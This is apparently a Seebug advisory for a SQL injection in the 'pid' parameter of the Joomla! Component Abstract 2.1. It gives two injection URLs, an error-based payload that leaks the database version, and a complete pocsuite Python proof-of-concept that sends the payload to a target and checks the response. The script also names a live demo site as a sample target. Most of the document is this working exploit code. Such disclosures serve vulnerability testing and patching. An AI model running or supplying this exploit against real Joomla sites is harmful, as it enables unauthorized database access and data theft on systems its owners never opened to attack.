Joomla! Component Abstract v2.1 - SQL Injection

2017-03-04T00:00:00
ID SSV:92733
Type seebug
Reporter Z3r0yu
Modified 2017-03-04T00:00:00

Description

Joomla! Component the Abstract v2. 1 - SQL Injection

Joomla! Component the Abstract v2. 1, There is a parameter filter is not strict, leading to a sql injection vulnerability

Injection point:

# http://localhost/[PATH]/index. php? option=com_abstract&view=conferences&layout=detail&pid=[SQL]
# http://localhost/[PATH]/index. php? option=com_abstract&view=conferences&task=contactEmail&pid=[SQL]

Error injecting the payload:

1+OR+1+GROUP+BY+CONCAT_WS(0x3a,0x496873616e53656e63616e,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1

Test screenshot:

PoC validation:

                                        
                                            
                                                #!/usr/bin/env python
# coding: utf-8

from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    vulID = '0'  # ssvid
    version = '1.0'
    author = ['Z3r0yu']
    vulDate = '2017-03-02'
    createDate = '2017-03-03'
    updateDate = '2017-03-03'
    references = ['https://www.exploit-db.com/exploits/41493/']
    name = 'Joomla! Component Abstract 2.1 - SQL Injection'
    appPowerLink = 'https://extensions.joomla.org/extensions/extension/calendars-a-events/events/abstract-manager/'
    appName = 'Component_Abstract_2.1_sql_inj_PoC'
    appVersion = '2.1'
    vulType = 'SQL Injection'
    desc = '''
        pid参数过滤不严带入SQL语句导致SQL注入
    '''
    samples = ['http://demo.joomla6teen.com/abstractmanager']
    install_requires = ['']

    def _attack(self):
        
        return self._verify() 

    def _verify(self):
        result = {}
        vulurl = self.url
        payload = "/index.php?option=com_abstract&view=conferences&layout=detail&pid=1+OR+1+GROUP+BY+CONCAT_WS(md5(233),0x3a,0x496873616e53656e63616e,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1"
        exp = vulurl+payload
        resp = req.get(exp)

        if 'e165421110ba03099a1c0393373c5b43' in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
            result['VerifyInfo']['Payload'] = payload

        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)